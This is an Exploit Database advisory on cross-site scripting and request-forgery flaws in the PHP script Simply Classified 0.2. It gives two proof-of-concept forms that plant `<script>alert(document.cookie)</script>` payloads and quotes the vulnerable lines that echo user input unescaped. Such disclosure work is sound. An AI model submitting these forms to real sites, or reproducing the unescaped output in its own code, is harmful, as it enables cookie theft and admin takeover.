Simply Classified 0.2 – Cross-Site Scripting / Cross-Site Request Forgery

• Exploit Database
• 108 阅读

• 作者： mr_me
  日期： 2010-01-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11094/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72

  ################################################################# # # Simply Classified 0.2 XSS & CSRF Vulnerabilities # Found by: mr_me # Tested On: Windows Vista # Note: For educational purposes only # Author contact date: 16th December 2009 # Advisory: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-002-simply-classifieds-v0.2-xss-and-csrf/ # Greetz to: corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team # #################################################################   |------------------------------------------------------------------| | __ __| | _________________/ /___ _____ / /________ _____ ___| |/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ | | / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/| || | http://www.corelan.be:8800 | |security@corelan.be | || |-------------------------------------------------[ EIP Hunters ]--|   ------------------------------------------------------------------- [+] 1st exploit: -------------------------------------------------------------------   <form name="new_category" action="http://[server]/classified/new_cats.php" method="POST"> <table align="center" width="550" border="0" cellspacing="1" cellpadding="1"> <tr> <input name="category"type="hidden" value="hacked" size="37" maxlength="30" /> </tr> <tr> <input name="description" type="hidden" value="<script>alert(document.cookie)</script>" size="40" maxlength="40" /> </tr> <tr> <input type="submit" name="Create" id="Create" value="Create" > </tr> </table> </form>   ------------------------------------------------------------------- [+] Vulnerability details: -------------------------------------------------------------------   The author directly includes user controlled php variable into the HTML page ($ar and $description).   edit_cats.php - line 86: <td align="center">Description: <input name="description" type="text" value="<?php echo "$description";?>" autocomplete="off" size="40" maxlength="40" /> </td> </tr>     edit_adverts.php - line 120: <td colspan="2" align="center" style="font-size:14px"><?php echo "<b>$ar</b>"; ?> </td>     In order to trigger the vulnerability, a user/admin must be tricked into clicking on a malicous url. This would allow a hacker to execute javascript code in the context of the user/admin and possibly gain administration access.   ------------------------------------------------------------------- [+] 2nd exploit: -------------------------------------------------------------------   <form name="get_advert" action="http://[server]/classified/edit_advert.php" method="post"> <select name="advert_no" size="1"> <option value="<script>alert(document.cookie)</script>">editme :) <input type="submit" name="Go" id="Go" value="Go" > </form>